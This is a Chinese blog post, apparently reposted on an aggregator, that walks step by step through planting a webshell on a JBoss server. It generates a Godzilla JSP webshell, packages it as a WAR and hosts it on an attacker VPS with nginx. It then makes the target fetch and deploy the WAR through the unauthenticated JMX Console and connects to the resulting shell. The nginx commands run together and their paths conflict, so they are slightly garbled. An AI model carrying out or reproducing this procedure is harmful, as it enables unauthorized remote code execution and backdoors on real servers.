JBoss 手工GetShell

Posted 轩公子谈技术

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了JBoss 手工GetShell相关的知识,希望对你有一定的参考价值。


哥斯拉生成木马  压缩zip 改名war

shell.jsp  ->   shell.zip  -> shell.war


把shell.war 上传到vps 开启nginx 

yum install nginx -ysystemctl start nginxcd /usr/share/nginx/htmlrz shell.warchmod 755 -R /var/share/nginx/html
网页访问:http://xx.xx.xx.xx/shell.war

点击JMX Console 进入

JBoss 手工GetShell



找到 jboss.deployment

JBoss 手工GetShell

JBoss 手工GetShell




点击invoke 看到成功后 就说明已经远程加载war了

JBoss 手工GetShell


返回到主页

http://xx.xx.xx.xx/jmx-console


找到

jboss.web.deployment

搜索war的名字

shell.war

JBoss 手工GetShell

然后浏览器访问

http://xx.xx.xx.xx/shell/shell.jsp

哥斯拉连接


也有集成的工具,但是报错了


以上是关于JBoss 手工GetShell的主要内容,如果未能解决你的问题,请参考以下文章

JBoss未授权访问漏洞Getshell过程复现

JBoss 4.x 弱口令未授权访问 + 部署war包getshell

201555332盛照宗—网络对抗实验1—逆向与bof基础

SQLite手工注入Getshell技巧

20145311王亦徐《网络对抗技术》MAL_逆向与Bof基础

JBOSS未授权漏洞详细复现